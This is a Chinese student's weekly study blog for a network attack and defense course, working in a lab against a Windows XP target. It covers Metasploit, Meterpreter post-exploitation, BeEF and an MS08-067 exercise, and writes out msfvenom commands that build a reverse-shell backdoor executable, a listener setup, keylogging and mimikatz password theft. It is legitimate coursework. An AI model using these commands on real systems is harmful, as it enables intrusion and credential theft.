20169212 2016-2017-2 《网络攻防实践》第七周学习总结

20169212 2016-2017-2 《网络攻防实践》第七周学习总结

教材学习内容总结

本周学习了第七章内容，主要为Windows操作系统安全攻防。学习了操作系统的基本框架、基本结构，操作系统的安全体系结构与机制（身份认证机制、授权与访问控制机制、安全审计机制、其它机制）及远程安全攻防技术。远程安全攻防主要包括：系统的安全漏洞生命周期、远程口令猜测与破解、远程渗透攻击、本地安全攻防技术（本地提权、敏感信息窃取、远程控制及后门程序）。

教材学习中的问题和解决过程

MS08-067漏洞全称为“Windows Server服务RPC请求缓冲区溢出漏洞”，可在中国国家信息安全漏洞库当中找到——CVE-2008-4250，也可在CVE官网找到相关信息。如果用户在受影响的系统上收到特制的 RPC（远程过程调用）请求，则该漏洞可能允许远程执行代码。Kali为攻击机(IP 192.168.8.115)，Windows xp为靶机（IP 192.168.8.112）。
利用漏洞获取shell过程如下：

视频学习总结

漏洞检索与利用

漏洞利用工具集
1.Exploit Database->searchsploit

2.pattern create
测试漏洞
armitage
结合MSF进行利用
3.jboss-autopwn-linux/win
专门针对Jboss的漏洞利用工具
4.ikat
自动化开启，等待目标访问中招。
5.termineter
评估智能电表的安全性。

Metasploit基础

1.启动介绍
Kali漏洞工具集中的重要组成工具，使用时首先要开启两个服务PostgreSQL数据库服务和metasploit服务，然后就可以完整的利用msf数据库查询exploit和记录。
service postgresql start 无法启动，没有软件
service metasploit start
配置随系统启动
update-rc.d postgresql enable
update-rc.d metasploit enable
2.路径介绍
msf的路径cd /usr/share/metasploit-framework/
msfencode -l 未找到命令

3.基本命令
msfpayload：用来生成payload或者shellcode
搜索时候可以用msfpayload -l |grep “windows”这样的命令来查询
-o选项可以列出payload所需的参数
msfencode：msf中的编码器，早期为了编码绕过AV现在常用msfpayload与它编码避免exploit的坏字符串。使用它作为攻击载荷能够获得目标系统的一个meterpretershell的链接。
msfconsole:
开启metasploit的console
4.测试示例：发现漏洞，搜索exploit

Metterpreter

Metasploit中的很重要的模块，Metasploit框架中的一个拓展模块，作为溢出成功后的攻击载荷使用。
常用的命令：
background 将当前会话放置后台
load/use 加载模块
interact 切换进一个信道
migrate 迁移进程
run 执行一个已有的模块
resource 执行一个已有的rc脚本，可以自定义
生成meterpreter后门:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.125 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe
设置参数

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LPORT 2333

设置成功后仍然无法使用，显示

Metasploit后渗透测试

1.查看跳板机的网卡
ifconfig
2.添加路由表
run autoroute -s 10.0.0.1
3.开socks代理

background 把session置于后台
search socks  使用socks开代理
use auxiliary/server/socks4a
showoptions
exploit

4.通过background和sessions -i可以自由切换进入session
5.输入run可以看到在meterpreter上可以做的很多命令
6.通过run post/可以看到后渗透测试的模块
7.扫描内网信息
run arp_scanner -r 目标IP地址
内网端口转发
upload lcx.exe c: 上传到C盘根目录

BeeF

对XSS漏洞的利用，BeeF是浏览器攻击框架的简称，专注于浏览器端的渗透工具。
1.命令行下启动BeeF
直接使用命令 beef-xss即可，打开浏览器，会自动跳转至beef登录页面：

使用默认用户名beef和密码beef即可进入主界面：

2.假设被测试主机由于XSS漏洞请求到
测试利用：输入网址 http://127.0.0.1:3000/demod/basic.html，可以进入一个测试页面

这样在主界面左端就可以看到一个在线主机：

3.HOOK持续的时间为关闭测试页面为止，在此期间相当于被控制了，可以发送攻击命令，在Commands模块我们可以完成很多任务。有四种颜色表示，颜色不同代表攻击模块是否可用及隐蔽性强度。
4.选取MISC测试：

5.Proxy功能
借助目标浏览器访问目标可以访问的地址。
利用use as Proxy设定主机代理，在Rider选项中的Forge Request当中编辑要发送的内容

信息发送后，可通过History选项看到，待传输成功后，点击相应的信息，即可显示详细的传输过程：

6.BeeF与Metasploit结合加载
修改文件config.yaml

打开一个msfconsole

可以看到Metasploit下面多了很多可以使用的模块。

视频学习中的问题和解决过程

问题1.Metasploit工具的使用中遇到问题

在使用Metasploit工具之前需要打开 postgresql数据库服务和 metasploit 服务，但是出现了无法启动的错误。因为这个版本已经没有metasploit服务了，需要利用以下方法打开带数据库支持的MSF服务：

etc/init.d/postgresql start 或者 service postgresql start  //启动postgresql数据库
msfdb init         //初始化MSF数据库
msfconsole
db_status          //在msf中可以查看数据库连接状态

下面就以SSH用户名枚举攻击对metasploit工具进行测试，首先靶机的IP地址是 192.168.8.125，然后通过之前学过的 nmap 对靶机所开放的端口服务版本进行探测

接着就在已打开的msf中使用命令 search ssh，找寻msf所提供的关于ssh服务的工具：

这里选择上图标记出的工具，进行ssh用户名枚举，接着利用命令 use使用该工具：

设置密码文档：

设置对应参数：

使用exploit攻击：

攻击成功。

问题2.Meterpreter工具的使用出现问题

发现在终端中输入msfpayload时，出现错误“bash: msfpayload: command not found”。网上找了一下，原来是从2015年6月8日之后，msfpayload已经被移除了。以后只要使用msfvenom就行了，它集成了msfpayload和msfencode的功能

所以生成命令为：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.37.130 LPORT=2333 -i 5 -f exe > /root/door.exe

生成成功，将其移入XP系统中。
在kali的msf中执行exploit开始监听：

当XP系统运行后门程序可以看到：

然后开启键盘监听：

使用 load mimikatz 进行目标机密码明文的抓取：

上周考试错题总结

1.下面哪些Linux命令可以ASCII码和16进制单字节方法输出Hello.java的内容（BC）
A.od -b -tx1 Hello.java
B.od -tcx1 Hello.java
C.od -tc -tx1 Hello.java
D.od -tbx1 Hello.java
总结：od命令，用户通常使用od命令查看特殊格式的文件内容。通过指定该命令的不同选项可以以十进制、八进制、十六进制和ASCII码来显示文件。
语法：od ［选项］ 文件…命令中各选项的含义：

• A 指定地址基数，包括：
  d 十进制
  o 八进制（系统默认值）
  x 十六进制
  n 不打印位移值
• t 指定数据的显示格式，主要的参数有：
  c ASCII字符或反斜杠序列
  d 有符号十进制数
  f 浮点数
  o 八进制（系统默认值为02）
  u 无符号十进制数
  x 十六进制数

2.根据工作的网络协议层次，防火墙技术中工作网络层的是（AB）
A.包过滤
B.电路级网关
C.应用层代理
D.基于状态检测的包过滤
总结：电路级网关在传输层，应用层代理在应用层，基于状态的包过滤涉及到传输层。

学习进度条

学习目标（本学期）

完成网络攻防书本及视频的学习，完成各种攻防实践作业。

第二周进度

学习教材《网络攻防技术与实践》第一章和第二章；学习kali视频5个；查找了解了两个网络安全工具；查找两个黑客资料。

第三周进度

学习视频6-10；学习课本第三章；完成第三章课后作业。

第四周进度

网络嗅探的理论与工具；网络协议分析的理论与工具。

第五周进度

学习视频5个；学习教材最后一部分。

第六周进度

学习视频5个(21-25)；学习教材第五、六章。

第七周进度

学习视频5个（26-30）；学习教材第七章。

上周目标完成情况

完成

改进情况

注重实践学习，注意解决问题。

感想体会

本周的实验做成功后感觉很开心，获得了很多知识。扫描后得到漏洞，利用漏洞进行攻击获取权限，很感兴趣。

本周学习计划

课本七章学习:5小时
kali视频16-20:7小时
教材实践:2小时
整理写博客:2小时

参考资料

网络攻防技术与实践